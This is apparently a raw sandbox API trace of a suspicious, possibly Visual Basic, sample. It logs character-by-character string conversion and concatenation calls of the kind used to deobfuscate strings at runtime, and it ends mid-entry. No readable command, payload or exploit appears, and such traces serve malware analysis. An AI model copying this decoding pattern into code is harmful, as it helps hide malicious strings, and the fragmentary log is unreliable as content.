VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.170] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.170] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.170] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0084.171] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0084.171] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.171] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\", lpUsedDefaultChar=0x0) returned 1 [0084.171] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0084.172] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.172] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="S", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S", lpUsedDefaultChar=0x0) returned 1 [0084.172] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.172] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="F", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="F") returned 1 [0084.173] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="a", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="a", lpUsedDefaultChar=0x0) returned 1 [0084.173] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.173] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="T", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="T") returned 1 [0084.173] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0084.174] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.174] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.174] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="N", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N", lpUsedDefaultChar=0x0) returned 1 [0084.175] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.175] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="A", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="A") returned 1 [0084.175] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.175] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_", lpUsedDefaultChar=0x0) returned 1 [0084.175] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0084.176] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="R", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="R", lpUsedDefaultChar=0x0) returned 1 [0084.176] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="E", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="E") returned 1 [0084.177] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.177] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.177] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.177] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.177] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Z", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Z", lpUsedDefaultChar=0x0) returned 1 [0084.178] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.178] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="M", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="M") returned 1 [0084.179] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.179] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.179] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.179] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.179] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.180] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p", lpUsedDefaultChar=0x0) returned 1 [0084.180] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.180] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0084.180] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.181] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.181] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.181] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.181] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.182] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.182] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.182] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.182] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.182] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.183] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.183] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.183] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.183] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.183] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s", lpUsedDefaultChar=0x0) returned 1 [0084.184] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.184] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0084.184] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.184] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.185] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.185] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.185] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.185] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.185] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.186] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.186] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0084.186] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.186] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.186] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.187] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.187] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.187] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.187] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.188] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.188] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q", lpUsedDefaultChar=0x0) returned 1 [0084.188] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0084.189] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.189] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.189] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84", lpUsedDefaultChar=0x0) returned 1 [0084.190] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0084.190] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.190] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.191] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.191] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.191] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="i", lpUsedDefaultChar=0x0) returned 1 [0084.191] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\\", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="\\") returned 1 [0084.192] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="P", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="P", lpUsedDefaultChar=0x0) returned 1 [0084.192] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="C") returned 1 [0084.192] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0084.193] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0084.193] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.194] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.194] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.194] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.195] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.195] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.195] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.195] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.196] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.196] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.197] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.197] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.197] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="c", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="c", lpUsedDefaultChar=0x0) returned 1 [0084.198] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.198] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="V", cbMultiByte=1, lpWideCharStr=0xe4a94c, cchWideChar=1 | out: lpWideCharStr="V") returned 1 [0084.198] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.198] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.198] VarSub (in: pvarLeft=0x28f61c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.199] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe3eec4, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.199] VarCat (in: pvarLeft=0x28f468, pvarRight=0x28f548, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, 